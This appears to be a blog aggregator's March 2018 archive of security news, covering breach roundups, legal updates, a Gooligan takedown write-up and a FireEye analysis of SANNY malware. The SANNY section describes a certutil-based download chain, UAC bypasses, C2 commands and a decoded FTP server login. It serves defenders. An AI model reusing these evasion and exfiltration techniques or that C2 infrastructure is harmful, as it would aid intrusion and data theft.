Monthly Archives: March 2018
Weekly Cyber Risk Roundup: MyFitnessPal Breach, Carbanak Leader Arrested
Under Armor announced this week that approximately 150 million users of the diet and fitness app MyFitnessPal had their personal information acquired by an unauthorized third party sometime in February 2018. As Reuters noted, it is the largest data breach of 2018 in terms of the number of records affected.
The breach was discovered on March 25, and the data compromised includes usernames, email addresses, and hashed passwords — the majority of which used bcrypt, the company said.
“The affected data did not include government-issued identifiers (such as Social Security numbers and driver’s license numbers) because we don’t collect that information from users,” the company said in a statement. “Payment card data was not affected because it is collected and processed separately.”
MyFitnessPal also said that it would be requiring users to change their passwords and is urging users to do so immediately. The company is also urging users to review their accounts for suspicious activity as well as to change passwords on any other online accounts that used the same or a similar password to their now-breached MyFitnessPal credentials.
It is unclear how the unauthorized third party acquired the data, and the investigation is ongoing. Under Armour bought MyFitnessPal in February 2015 for $475 million.
Other trending cybercrime events from the week include:
- Employee accounts targeted: The Retirement Advantage is notifying clients that their employees’ personal information may have been compromised due to unauthorized access to an employee email account at its Applied Plan Administrators division. Storemont in Northern Ireland is warning all staff of a cyber-attack targeting email accounts with numerous password attempts, and a number of accounts were compromised due to the attack. Shutterfly is notifying customers that their personal information may have been compromised due to an employee’s credentials being used without authorization to access its Workday test environment.
- Payment card breaches: Manduka is notifying customers of a year-long payment card breach after discovering malware on its e-commerce web platform. Mintie Corporation is notifying customers of a ransomware attack that may have compromised customer payment card information. Fred Usinger said its hosting service provider notified the company of a breach involving personal information and stored payment information.
- Other data breaches: A report from New York’s Attorney General said that 9.2 million New Yorkers had their data exposed in 2017, quadruple the number from 2016. Motherboard obtained thousands of user account details that are circulating on public image boards, and many of those accounts are related to a bestiality website. Mendes & Haney is notifying customers of unauthorized access to its network. Branton, de Jong and Associates is notifying customers that their tax information may have been compromised due to unauthorized access to its tax program. Researchers discovered a misconfigured database belonging to the New York internal medicine and cardiovascular health practice Cohen Bergman Klepper Romano Mds PC that exposed the patient information of 42,000 individuals.
- Other notable events: Baltimore’s 911 dispatch system was temporarily shut down after a hack by an unknown actor led to “limited breach” of the system that supports the city’s 911 and 311 services. Kent NHS Trust is notifying patients that a staff member who had accessed their medical records “without a legitimate business reason” has been dismissed. The Malaysian central bank said it thwarted a cyber-attack that involved falsified wire-transfer requests over the SWIFT bank messaging network. Boeing said that a few machines were infected with the WannaCry malware.
SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.
Cyber Risk Trends From the Past Week
Law enforcement officials in Spain have arrested the alleged leader of the cybercriminal syndicate behind the Carbankak and Cobalt malware attacks, which have targeted more than 100 financial organizations around the world and caused cumulative losses of over €1 billion since 2013.
Europol’s press release did not name the alleged mastermind behind the group; however, Bloomberg reported that Spain’s Interior Ministry named the suspect as Denis K, a Ukrainian national who had accumulated about 15,000 bitcoins (worth approximately $120 million at the time of his arrest). Europol noted that numerous other coders, mule networks, and money launderers connected to the group were also the target of the international law enforcement operation.
The group first used the Anunak malware in 2013 to target financial transfers and ATM networks, and by the following year they had created a more sophisticated version of the malware known as Carbanak, which was used by the group used until 2016. At that point the group carried out an even more sophisticated wave of attacks using custom-made malware based on the Cobalt Strike penetration testing software, Europol said.
“The criminals would send out to bank employees spear phishing emails with a malicious attachment impersonating legitimate companies,” Europol wrote in a press release. “Once downloaded, the malicious software allowed the criminals to remotely control the victims’ infected machines, giving them access to the internal banking network and infecting the servers controlling the ATMs. This provided them with the knowledge they needed to cash out the money.”
Carlos Yuste, a Spanish police chief inspector who helped lead the operation, told Bloomberg that “the head has been cut off” of the high-profile group. Steven Wilson, Head of Europol’s European Cybercrime Centre, said that the arrest illustrates how law enforcement “is having a major impact on top level cybercriminality.”
High Quality Problems – Paul’s Security Weekly #553
This week, Executive Director of Source Boston 2018 Rob Cheyne joins us for an interview! Paul delivers the Technical Segment this week entitled, Cutting The Cord: The Ideal Home Network Setup! In the Security News, we have updates from Apple macOS, Windows 7 Meltdown patch, Atlanta’s Ransomware attack, a special appearance in the Security News from Apollo Clark, and more on this episode of Paul’s Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/Episode553
Visit https://www.securityweekly.com/psw for all the latest episodes!
AV18-053: PHP Security Updates
High Level Lessons – Enterprise Security Weekly #85
This week, Paul is joined by our very own Keith Hoodlet to review the book The Phoenix Project! In the news, we have updates from Cisco, Distil Networks, BeyondTrust, Cambridge Analytica, and more on this episode of Enterprise Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ES_Episode85
Visit https://www.securityweekly.com/esw for all the latest episodes!
AL18-003: Drupal Security Vulnerability
Cisco Event Response: March 2018 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication
Nearly A Week After Atlanta’s Cyberattack, Things Are Nowhere Near Normal
AV18-051: OpenSSL Security Updates
AV18-052: Cisco Security Updates
We Like Straight Talk – Business Security Weekly #79
Dan Wheatley, Partner and CEO at Straight Talk Agency, joins us for the interview this week. Tenable hires Morgan Stanley, Sift Science raised $53M Series D, and Virsec raised $24M Series B. This segment is about the companies making news with founding rounds, exits, and other impacts you need to know about in the industry.
Full Show Notes: https://wiki.securityweekly.com/BSWEpisode79
Visit http://securityweekly.com/category/bsw for all the latest episodes!
6 Tips to Overcome Your Online Privacy Concerns
[[ This is a content summary only. Visit my website for full links, other content, and more! ]]
CIPL and AvePoint Release Second Global GDPR Readiness Report
On March 26, 2018, the Centre for Information Policy Leadership at Hunton & Williams LLP and AvePoint released its second Global GDPR Readiness Report (the “Report”), detailing the results of a joint global survey launched in July 2017 concerning organizational preparedness for implementing the EU General Data Protection Regulation (“GDPR”). The Report tracks the GDPR implementation efforts of over 235 multinational organizations, and builds on the findings of the first Global GDPR Readiness Report by providing insights on key changes in readiness levels from 2016 to 2017.
Key highlights of the report include:
- Over half of all respondents have committed additional budget to GDPR implementation, with increases ranging from hundreds of thousands of dollars to upwards of $50 million.
- While technology tools and software are the number one priority for GDPR-focused budget spending, continued reliance on manual methods for building and maintaining data processing inventories, as well as low usage rates of automated software to identify and tag data, indicate that much work is still to be done to assess and procure these solutions.
- Almost a quarter of organizations have not yet implemented any processes to update their controller-processor contracts or review or renegotiate existing agreements. Organizations will have to closely look at their contracts ahead of May 25, 2018, to ensure they include the new required terms introduced by the GDPR.
- Despite little information being available on new GDPR transfer mechanisms such as adequate safeguards or certifications, for the second year in a row, respondents indicated that they are likely to use these mechanisms, with almost one-fifth of organizations reporting they will rely on the latter post-GDPR.
- With regard to security, the majority of organizations have put internal reporting procedures and incident response plans in place. However, organizations still have some work to do in implementing other data breach response procedures, such as conducting dry runs and retaining PR and media consultants.
- Legitimate interest remains the area most in need of clarity under the GDPR, followed by data protection impact assessments and risk, breach notification, notice and consent, and privacy by design.
To read more about these highlights and other insights of the study, please view the full report.
AV18-050: Mozilla Security Updates
DOJ Accuses Iranian Nationals of “Brazen Cyber Assault” on Universities and Government Agencies
The U.S. Department of Justice (the “DOJ”) has unsealed an indictment accusing nine Iranian nationals of engaging in a “massive and brazen cyber assault” against at least 176 universities, 47 private companies and 7 government agencies and non-governmental organizations, including the Federal Energy Regulatory Commission (“FERC”). According to the DOJ, the nationals worked for Mabna Institute, an Iranian-based company, as “hackers for hire,” stealing login credentials and other sensitive information to sell within Iran and for the benefit of the Iranian government.
The indictment notes that the nationals engaged in a number of tactics to gain unauthorized access to systems including: (1) targeting customized spear phishing emails based on publicly available information about the email recipients; (2) obtaining stolen credentials to access accounts; and (3) “password spraying,” whereby the nationals would collect lists of names and email addresses through Internet searches and attempt to gain access to accounts through commonly used passwords.
While the indictment states that the attacks by the nationals cost U.S.-based universities over $3.4 billion in academic and intellectual property theft, the DOJ did not indicate whether sensitive information was stolen from FERC. Notably, FERC collects information from across the energy sector regarding critical infrastructure, called “Critical Electric/Energy Infrastructure” (“CEII”). In late 2015, Congress required FERC to publish regulations enhancing protection for CEII from disclosure, though it did not specifically direct FERC to increase security for CEII. FERC published these regulations in December 2016.
Trump Ally Sues Qatar For Hacking His Email
Learn Network Attacks and Prevention Through Android
[[ This is a content summary only. Visit my website for full links, other content, and more! ]]
CERTs, CSIRTs and SOCs after 10 years from definitions
Weekly Cyber Risk Roundup: Orbitz Breach, Facebook Privacy Fallout
One of the biggest data breach announcements of the past week belonged to Orbitz, which said on Tuesday that as many as 880,000 customers may have had their payment card and other personal information compromised due to unauthorized access to a legacy Orbitz travel booking platform.
“Orbitz determined on March 1, 2018 that there was evidence suggesting that, between October 1, 2017 and December 22, 2017, an attacker may have accessed certain personal information, stored on this consumer and business partner platform, that was submitted for certain purchases made between January 1, 2016 and June 22, 2016 (for Orbitz platform customers) and between January 1, 2016 and December 22, 2017 (for certain partners’ customers),” the company said in a statement.
Information potentially compromised includes payment card information, names, dates of birth, addresses, phone numbers, email addresses, and gender.
As American Express noted in its statement about the breach, the affected Orbitz platform served as the underlying booking engine for many online travel websites, including Amextravel.com and travel booked through Amex Travel Representatives.
Expedia, which purchased Orbitz in 2015, did not say how many or which partner platforms were affected by the breach, USA Today reported. However, the company did say that the current Orbitz.com site was not affected.
Other trending cybercrime events from the week include:
- State data breach notifications: Island Outdoor is notifying customers that payment card information may have been stolen due to the discovery of malware affecting several of its websites. Agemni is notifying customers about unauthorized charges after “a single authorized user of our software system used customer information to make improper charges for his personal benefit.” The Columbia Falls School District is notifying parents of a cyber-extortion threat involving their children’s personal information. Intuit is notifying TurboTax customers that their accounts may have been accessed by an actor leveraging previously leaked credentials. Taylor-Dunn Manufacturing Company is notifying customers that it discovered cryptocurrency mining malware on a server and that a file containing personal information of those registered for the Taylor-Dunn customer care or dealer center may have been accessed. Nampa School District is notifying a “limited number” of employees and Skamania Public Utility District is notifying customers that their personal information may have been compromised due to incidents involving unauthorized access to an employee email account.
- Data exposed: A flaw in Telstra Health’s Argus software, which is used by more than 40,000 Australian health specialists, may have exposed the medical information of patients to hackers. Primary Healthcare is notifying patients of unauthorized access to four employee email accounts. More than 300,000 Pennsylvania school teachers may have had their personal information publicly released due to an employee error involving the Teacher Management Information System.
- Notable ransomware attacks: The city of Atlanta said a ransomware attack disrupted internal and customer-facing applications, which made it difficult for citizens to pay bills and access court-related information. Atrium Hospitality is notifying 376 hotel guests that their personal information may have been compromised due to a ransomware infection at a workstation at the Holiday Inn Sacramento. Finger Lakes Health said it lost access to its computer system due to ransomware infection.
- Other notable events: Frost Bank said that malicious actors comprised a third-party lockbox software program and were able to access images of checks that were stored in the database. National Lottery users are being advised to change their passwords after 150 accounts were affected by a “low-level” hack. A lawsuit against Internet provider CenturyLink and AT&T-owned DirecTV alleges that customer data was available through basic Internet searches.
SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.
Cyber Risk Trends From the Past Week
Facebook has faced a week of criticism, legal actions, and outcry from privacy advocates after it was revealed that the political consulting Cambridge Analytica had accessed the information of 50 million users and leveraged that information while working with the Donald Trump campaign in 2016.
“Cambridge Analytica obtained the data from a professor at the University of Cambridge who had collected the information by creating a personality-quiz app in 2013 that plugged into Facebook’s platform,” The Wall Street Journal reported. “Before a policy change in 2015, Facebook gave app creators and academics access to a treasure trove of data, ranging from which pages users liked to details about their friends.”
It isn’t clear how many other developers might have retained information harvested from Facebook before the 2015 policy change, The Journal reported. However, Mark Zuckerberg said the company may spend “many millions of dollars” auditing tens of thousands of data collecting apps in order to get a better handle on the situation.
The privacy breach has already led to regulatory scrutiny and potential lawsuits around the globe. Bloomberg reported that the FTC is probing whether data handling violated terms of a 2011 consent decree. In addition, Facebook said it would conduct staff-level briefings with six congressional committees in the coming week. Some lawmakers have called for Zuckerberg to testify as well, and Zuckerberg told media outlets that he would be willing to do so if asked.
Facebook’s stock price has dropped from $185 to $159 over the past eight days amid the controversy, and several companies have suspended their advertising on Facebook or deleted their Facebook pages altogether due to the public backlash.
Taking down Gooligan part 3 — monetization and clean-up
This post provides an in-depth analysis of Gooligan monetization schemas and recounts how Google took it down with the help of external partners.
This post is the final post of the series dedicated to the hunt and take down of Gooligan that we did at Google in collaboration with Check Point in November 2016. The first post recounts the Gooligan origin story and offers an overview of how it works. The second one provides an in-depth analysis of Gooligan’s inner workings and an analysis of its network infrastructure. As this post builds on the previous two, I encourage you to read them if you haven’t done so already.
This series of posts is modeled after the talk I gave on the subject at Botconf in December 2017. Here is a recording of the talk:
You can also get the slides here , but they are pretty bare.
Monetization
Gooligan’s goal was to monetize the infected devices through two main fraudulent schemas: Ad fraud and Android app boosting.
Ad fraud
As shown in the screenshot above, periodically Gooligan will use its root privileges to overlay an ad popup for a legitimate app on top of any activity the user was currently doing. Under the hood, Gooligan knows when the user is looking at the phone, as it monitors various key events, including when the screen is turned on.
We don’t have much insight on how effective those ad campaigns were or who was reselling them, as they don’t abuse Google’s ads network, and they use a gazillion HTTP redirects, which makes attribution close to impossible. However we believe that ad fraud was the main driver of Gooligan revenue, given its volume and the fact that we blocked its fake installs as discussed below.
App Boosting
The second way Gooligan attempted to monetize infected devices was by performing Android app boosting. An app boosting package is a bundle of searches for a specific query on the Play store, followed by an install and a review. The search is used in an attempt to rank the app for a given term. This tactic is commonly peddled in App Store Optimization (ASO) guides.
The reason Gooligan went through the trouble of stealing OAuth tokens and manipulating the Play store is probably that the defenses we put in place are very effective at detecting and discounting fake synthetic installs. Using real devices with real accounts was the Gooligan authors’ attempt to evade our detection systems. Overall, it was a total failure on their side: We caught all the fake installs, and suspended the abusive apps and developers.
As illustrated in the diagram above, the app boosting was done in four steps:
Token stealing: The malware extracts the phone’s long term token from the phone’s accounts.
Taking order: Gooligan reports phone information to the central command and control system, and receives in response a reply telling it which app to boost, including which search term to use and which comment to leave (if any). Phone information is exfiltrated because Gooligan authors also had access to non-compromised phones and were trying to use information obtained from Gooligan to fake requests from those phones.
Token exchange: The long term token is exchanged for a short term token that allows Gooligan to access the Play store. We are positive that no user data was compromised by Gooligan, as no other data was ever requested by Gooligan.
Boosting: The fake search, installation, and potential review is carried out through the manipulated Play store app.
Clean-up
Cleaning up Gooligan was challenging for two reasons: First, as discussed in the infection post , its reset persistence mechanism meant that doing a factory reset was not enough to clean up the old unpatched devices. Second, the Oauth tokens had been exfiltrated to Gooligan servers.
Asking users to reflash their devices would have been unreasonable and issuing an OTA (Over The Air) update would have take too long. Given this difficult context and the need to act quickly to protect our users we went for an alternative solution that we rarely use: orchestrating a takedown with the help of third parties.
Takedown
With the help of Shadowserver foundation and domain registrars we sinkholed Gooligan domains and got them to point to Shadowserver controlled IPs instead of IPs controlled by Gooligan authors. This sinkholing ensured that infected devices couldn’t exfiltrate token or receive fraud commands, as they would connect to sinkhole servers instead of the real command and control servers. As shown in the graph above, our takedown was very successful: It blocked over 50M attempts to connect to Gooligan’s control server in 2017.
Notifications
With the sinkhole in place, the second part of the remediation involved resecuring the accounts that were compromised, by disabling the exfiltrated tokens and notifying the users. Notification at that scale is very complex, for three key reasons:
Reaching users in a timely fashion across a wide range of devices is difficult. We ended up using a combination of SMS, email, and Android messaging, depending on what communication channel was available.
It was important to make the notification understandable and useful to all users. Explaining what was happening clearly and simply took a lot of iteration. We ended up with the notification shown in the screenshot above.
Once crafted, the text of the notification and help page had to be translated into the languages spoken by our users. Performing high quality internationalization for over 20 languages very quickly was quite a feat.
Epilogue
Overall, in order to respond to Gooligan, many people, including myself, ended up working long hours through the Thanksgiving weekend (an important holiday in the U.S.). Our commitment to quickly eradicate this threat paid off: On the evening of Monday, November 29th, the takedown took place, followed the next day by the resecuring of the compromised accounts. All in all, this takedown took a mere few days, which is blazing fast when you compare it to other similar ones. For example, the Avalanche botnet ) takedown took four years of intensive efforts.
To conclude, Gooligan was a very challenging malware to tackle, due to its scale and unconventional tactics. We were able to meet this challenge and defeat it, thanks to a cross-industry effort and the involvement of many teams at Google that didn’t go home until users were safe.
Thanks for reading this post all the way to the end. I hope it showcases how we approach botnet fighting and sheds some light on some of the lesser known, yet still critical, activities that our research team assists with.
Thank you for reading this post till the end! If you enjoyed it, don’t forget to share it on your favorite social network so that your friends and colleagues can enjoy it too and learn about Gooligan.
To get notified when my next post is online, follow me on Twitter , Facebook , Google+ , or LinkedIn . You can also get the full posts directly in your inbox by subscribing to the mailing list or via RSS .
A bientôt!
How to download your Facebook data
With all the news about Facebook recently, you might be wondering, what exactly does Facebook know about me from my profile? Sure, you can peruse your profile online, but that doesn’t tell the whole story. One way to see what Facebook has on you is to download your Facebook data.
The ability to download your Facebook data isn’t really new, but not many users know that you can do it. It only takes a few minutes; how long depends on how big your data files are. Here are the steps to download your Facebook data.
If you’ve decided that you want to leave Facebook completely, here’s how to delete, disable, or limit your Facebook account.
Financial Stability Board to Develop International Cybersecurity Lexicon
On March 20, 2018, the Financial Stability Board (“FSB”) delivered a note to finance ministers and central bank governors from the world’s top 20 economic powers, known as the G-20. The note provides a progress update on the FSB’s work to develop a common vocabulary of cyber terms.
The FSB is developing the cyber lexicon to address cybersecurity and cyber resilience in the financial sector and hopes that it will boost cross-border cooperation on cybersecurity. The note warned that “malicious use of Information and Communication Technologies…could disrupt financial services crucial to both national and international financial systems, undermine security and confidence and endanger financial stability.”
According to the note, “[t]he FSB has formed a working group, chaired by the U.S. Federal Reserve Board and comprised of approximately 15 members representing a range of financial sectors (banks, financial market infrastructures, securities and insurance) and jurisdictions, to develop the lexicon.”
For more information, including the next steps and indicative time line, read the full note.
You Stole My Sweater – Paul’s Security Weekly #552
Paul gives a tech segment on How to find the most innovative tech at a security show. In the news, we have updates from Alex Stamos, Facebook harvesting information about YOU, Uber self-driving car hits and kills pedestrian, and more on this episode of Paul's Security Weekly!
→Full Show Notes: https://wiki.securityweekly.com/Episode552
→Visit https://www.securityweekly.com/psw for all the latest episodes!
SANNY Malware Delivery Method Updated in Recently Observed Attacks
Introduction
In the third week of March 2018, through FireEye’s Dynamic Threat Intelligence, FireEye discovered malicious macro-based Microsoft Word documents distributing SANNY malware to multiple governments worldwide. Each malicious document lure was crafted in regard to relevant regional geopolitical issues. FireEye has tracked the SANNY malware family since 2012 and believes that it is unique to a group focused on Korean Peninsula issues. This group has consistently targeted diplomatic entities worldwide, primarily using lure documents written in English and Russian.
As part of these recently observed attacks, the threat actor has made significant changes to their usual malware delivery method. The attack is now carried out in multiple stages, with each stage being downloaded from the attacker’s server. Command line evasion techniques, the capability to infect systems running Windows 10, and use of recent User Account Control (UAC) bypass techniques have also been added.
Document Details
The following two documents, detailed below, have been observed in the latest round of attacks:
MD5 hash: c538b2b2628bba25d68ad601e00ad150
SHA256
hash:
b0f30741a2449f4d8d5ffe4b029a6d3959775818bf2e85bab7fea29bd5acafa4
Original Filename: РГНФ 2018-2019.doc
The document shown in Figure 1 discusses Eurasian geopolitics as they relate to China, as well as Russia’s security.
Figure 1: Sample document written in Russian
MD5 hash: 7b0f14d8cd370625aeb8a6af66af28ac
SHA256
hash:
e29fad201feba8bd9385893d3c3db42bba094483a51d17e0217ceb7d3a7c08f1
Original Filename: Copy of communication from Security
Council Committee (1718).doc
The document shown in Figure 2 discusses sanctions on humanitarian operations in the Democratic People’s Republic of Korea (DPRK).
Figure 2: Sample document written in English
Macro Analysis
In both documents, an embedded macro stores the malicious command line to be executed in the TextBox property (TextBox1.Text) of the document. This TextBox property is first accessed by the macro to execute the command on the system and is then overwritten to delete evidence of the command line.
Stage 1: BAT File Download
In Stage 1, the macro leverages the legitimate Microsoft Windows certutil.exe utility to download an encoded Windows Batch (BAT) file from the following URL: http://more.1apps[.]com/1.txt. The macro then decodes the encoded file and drops it in the %temp% directory with the name: 1.bat.
There were a few interesting observations in the command line:
- The macro copies the Microsoft Windows certutil.exe utility to the %temp% directory with the name: ct.exe. One of the reasons for this is to evade detection by security products. Recently, FireEye has observed other threat actors using certutil.exe for malicious purposes. By renaming “certutil.exe” before execution, the malware authors are attempting to evade simple file-name based heuristic detections.
- The malicious BAT file is stored as the contents of a fake PEM encoded SSL certificate (with the BEGIN and END markers) on the Stage 1 URL, as shown in Figure 3. The “certutil.exe” utility is then leveraged to both strip the BEGIN/END markers and decode the Base64 contents of the file. FireEye has not previously observed the malware authors use this technique in past campaigns.
Figure 3: Malicious BAT file stored as an
encoded file to appear as an SSL certificate
BAT File Analysis
Once decoded and executed, the BAT file from Stage 1 will download an encoded CAB file from the base URL: hxxp://more.1apps[.]com/. The exact file name downloaded is based on the architecture of the operating system.
- For a 32-bit operating system: hxxp://more.1apps[.]com/2.txt
- For a 64-bit operating system: hxxp://more.1apps[.]com/3.txt
Similarly, based on Windows operating system version and architecture, the CAB file is installed using different techniques. For Windows 10, the BAT file uses rundll32 to invoke the appropriate function from update.dll (component inside setup.cab).
- For a 32-bit operating system: rundll32 update.dll _EntryPoint@16
- For a 64-bit operating system: rundll32 update.dll EntryPoint
For other versions of Windows, the CAB file is extracted using the legitimate Windows Update Standalone Installer (wusa.exe) directly into the system directory:
The BAT file also checks for the presence of Kaspersky Lab Antivirus software on the machine. If found, CAB installation is changed accordingly in an attempt to bypass detection:
Stage 2: CAB File Analysis
As described in the previous section, the BAT file will download the CAB file based on the architecture of the underlying operating system. The rest of the malicious activities are performed by the downloaded CAB file.
The CAB file contains the following components:
- install.bat – BAT file used to deploy and execute the components.
- ipnet.dll – Main component that we refer to as SANNY malware.
- ipnet.ini – Config file used by SANNY malware.
- NTWDBLIB.dll – Performs UAC bypass on Windows 7 (32-bit and 64-bit).
- update.dll – Performs UAC bypass on Windows 10.
install.bat will perform the following essential activities:
- Checks the current
execution directory of the BAT file. If it is not the Windows system
directory, then it will first copy the necessary components
(ipnet.dll and ipnet.ini) to the Windows system directory before
continuing execution:
- Hijacks a legitimate Windows system service,
COMSysApp (COM+ System Application) by first stopping this service,
and then modifying the appropriate Windows service registry keys to
ensure that the malicious ipnet.dll will be loaded when the
COMSysApp service is started:
- After the hijacked COMSysApp service is
started, it will delete all remaining components of the CAB
file:
ipnet.dll is the main component inside the CAB file that is used for performing malicious activities. This DLL exports the following two functions:
- ServiceMain – Invoked when the hijacked system service, COMSysApp, is started.
- Post – Used to perform data exfiltration to the command and control (C2) server using FTP protocol.
The ServiceMain function first performs a check to see if it is being run in the context of svchost.exe or rundll32.exe. If it is being run in the context of svchost.exe, then it will first start the system service before proceeding with the malicious activities. If it is being run in the context of rundll32.exe, then it performs the following activities:
- Deletes the module
NTWDBLIB.DLL from the disk using the following command:
cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL
- Sets the code page on the system
to 65001, which corresponds to UTF-8:
cmd /c REG ADD HKCU\Console /v CodePage /t REG_DWORD /d 65001 /f
Command and Control (C2) Communication
SANNY malware uses the FTP protocol as the C2 communication channel.
FTP Config File
The FTP configuration information used by SANNY malware is encoded and stored inside ipnet.ini.
This file is Base64 encoded using the following custom character set: SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8
Upon decoding the file, the following credentials can be recovered:
- FTP Server: ftp.capnix[.]com
- Username: cnix_21072852
- Password: vlasimir2017
It then continues to perform the connection to the FTP server decoded from the aforementioned config file, and sets the current directory on the FTP server as “htdocs” using the FtpSetCurrentDirectoryW function.
System Information Collection
For reconnaissance purposes, SANNY malware executes commands on the system to collect information, which is sent to the C2 server.
System information is gathered from the machine using the following command:
The list of running tasks on the system is gathered by executing the following command:
C2 Commands
After successful connection to the FTP server decoded from the configuration file, the malware searches for a file containing the substring “to everyone” in the “htdocs” directory. This file will contain C2 commands to be executed by the malware.
Upon discovery of the file with the “to everyone” substring, the malware will download the file and then performs actions based on the following command names:
- chip command: This
command deletes the existing ipnet.ini configuration file from the
file system and creates a new ipnet.ini file with a specified
configuration string. The chip commands allows the attacker to
migrate malware to a new FTP C2 server. The command has the
following syntax:
- pull command: This command is used for the purpose of data exfiltration. It has the ability to upload an arbitrary file from the local filesystem to the attacker’s FTP server. The command has the following syntax:
The uploaded file is compressed and encrypted using the routine described later in the Compression and Encoding Data section.
- put command: This command is used to copy an existing file on the system to a new location and delete the file from the original location. The command has the following syntax:
- default command: If the command begins with the substring “cmd /c”, but it is not followed by either of the previous commands (chip, pull, and put), then it directly executes the command on the machine using WinExec.
- /user command: This
command will execute a command on the system as the logged in user.
The command duplicates the access token of “explorer.exe” and spawns
a process using the following steps:
- Enumerates the running processes on the system to search for the explorer.exe process and obtain the process ID of explorer.exe.
- Obtains the access token for the explorer.exe process with the access flags set to 0x000F01FF.
- Starts the application (defined in the C2 command) on the system by calling the CreateProcessAsUser function and using the access token obtained in Step 2.
C2 Command | Purpose |
chip | Update the FTP server config file |
pull | Upload a file from the machine |
put | Copy an existing file to a new destination |
/user | Create a new process with explorer.exe access token |
default command | Execute a program on the machine using WinExec() |
Compression and Encoding Data
SANNY malware uses an interesting mechanism for compressing the contents of data collected from the system and encoding it before exfiltration. Instead of using an archiving utility, the malware leverages Shell.Application COM object and calls the CopyHere method of the IShellDispatch interface to perform compression as follows:
- Creates an empty ZIP file with the name: temp.zip in the %temp% directory.
- Writes the first 16 bytes of the PK header to the ZIP file.
- Calls the CopyHere method of IShellDispatch interface to compress the collected data and write to temp.zip.
- Reads the contents of temp.zip to memory.
- Deletes temp.zip from the disk.
- Creates an empty file, post.txt, in the %temp% directory.
- The temp.zip file contents are Base64 encoded (using the same custom character set mentioned in the previous FTP Config File section) and written to the file: %temp%\post.txt.
- Calls the FtpPutFileW function to write the contents of post.txt to the remote file with the format: “from <computer_name_timestamp>.txt”
Execution on Windows 7 and User Account Control (UAC) Bypass
NTWDBLIB.dll – This component from the CAB file will be extracted to the %windir%\system32 directory. After this, the cliconfg command is executed by the BAT file.
The purpose of this DLL module is to launch the install.bat file. The file cliconfg.exe is a legitimate Windows binary (SQL Client Configuration Utility), loads the library NTWDBLIB.dll upon execution. Placing a malicious copy of NTWDBLIB.dll in the same directory as cliconfg.exe is a technique known as DLL side-loading, and results in a UAC bypass.
Execution on Windows 10 and UAC Bypass
Update.dll – This component from the CAB file is used to perform UAC bypass on Windows 10. As described in the BAT File Analysis section, if the underlying operating system is Windows 10, then it uses update.dll to begin the execution of code instead of invoking the install.bat file directly.
The main actions performed by update.dll are as follows:
- Executes the following
commands to setup the Windows registry for UAC bypass:
- Leverages a UAC
bypass technique that uses the legitimate Windows binary,
fodhelper.exe, to perform the UAC bypass on Windows 10 so that the
install.bat file is executed with elevated privileges:
- Creates an additional BAT file, kill.bat, in
the current directory to delete evidence of the UAC bypass. The BAT
file kills the current process and deletes the components update.dll
and kill.bat from the file system:
Conclusion
This activity shows us that the threat actors using SANNY malware are evolving their malware delivery methods, notably by incorporating UAC bypasses and endpoint evasion techniques. By using a multi-stage attack with a modular architecture, the malware authors increase the difficulty of reverse engineering and potentially evade security solutions.
Users can protect themselves from such attacks by disabling Office macros in their settings and practicing vigilance when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.
Indicators of Compromise
SHA256 Hash | Original Filename |
b0f30741a2449f4d8d5ffe4b029a6d3959775818bf2e85bab7fea29bd5acafa4 | РГНФ 2018-2019.doc |
e29fad201feba8bd9385893d3c3db42bba094483a51d17e0217ceb7d3a7c08f1
| Copy of communication from Security Council Committee (1718).doc |
eb394523df31fc83aefa402f8015c4a46f534c0a1f224151c47e80513ceea46f | 1.bat |
a2e897c03f313a097dc0f3c5245071fbaeee316cfb3f07785932605046697170 | Setup.cab (64-bit) |
a3b2c4746f471b4eabc3d91e2d0547c6f3e7a10a92ce119d92fa70a6d7d3a113 | Setup.cab (32-bit) |
South Dakota Enacts Breach Notification Law
As reported in BNA Privacy Law Watch, on March 21, 2018, South Dakota enacted the state’s first data breach notification law. The law will take effect on July 1, 2018, and includes several key provisions:
- Definitions of Personal Information and Protected Information. The law defines personal information as a person’s first name or first initial and last name in combination with any one or more of the following data elements: (1) Social Security Number; (2) driver’s license number or other unique identification number created or collected by a government body; (3) account, credit card or debit card number, in combination with any required security code, access code, password, routing number, PIN or any additional information that would permit access to a person’s financial account; (4) health information; and (5) an identification number assigned to a person by the person’s employer in combination with any required security code, access code, password, or biometric data generated from measurements or analysis of human body characteristics for authentication purposes. The law further defines “protected information” as (1) a username or email address in combination with a password, security question answer, or other information that permits access to an online account; and (2) account number or credit or debit card number, in combination with any required security code, access code, or password that permits access to a person’s financial account. Notably, the definition of “protected information” does not include a person’s name.
- Breach Notification Requirement. The law requires notification to affected individuals (and, in certain circumstances, the Attorney General, as explained below) in the event of unauthorized acquisition of unencrypted computerized data (or encrypted computerized data and the encryption key) by any person that materially compromises the security, confidentiality or integrity of personal information or protected information.
- Content and Method of Notice. The law does not contain content requirements for the notice. Notice may be provided (1) in writing; (2) electronically, if the notice is consistent with the provisions of E-SIGN; or (3) via substitute notice if the cost of providing notice would exceed $250,000, the number of affected individuals exceeds 500,000, or the entity does not have sufficient contact information for affected individuals. Substitute notice must consist of (1) email notice, if the entity has an email address for affected individuals; (2) conspicuous posting on the entity’s website; and (3) notification to statewide media.
- Timing. Notification to affected individuals is required within 60 days of discovery of the breach.
- Harm Threshold. The law contains a harm threshold, pursuant to which notification is not required if, following an appropriate investigation and notice to the Attorney General, the entity reasonably determines that the breach will not likely result in harm to the affected person(s).
- Notice to the Attorney General. The law requires notification to the Attorney General of any breach that exceeds 250 South Dakota residents.
- Notice to the Consumer Reporting Agencies. In the event notification to affected individuals is required, the law also requires notification to the nationwide consumer reporting agencies of the timing, distribution and content of the notice to individuals.
- Penalties for Non-Compliance. A violation of the breach notification law is considered a deceptive act under the state’s consumer protection laws. The South Dakota Attorney General noted that this violation has the effect of creating a private right of action. In addition, the Attorney General is authorized to enforce the breach notification law and may impose a fine of up to $10,000 per day per violation.
With this enactment, Alabama remains the sole U.S. state without a breach notification law.
DOSfuscation: Exploring the Depths of Cmd.exe Obfuscation and Detection Techniques
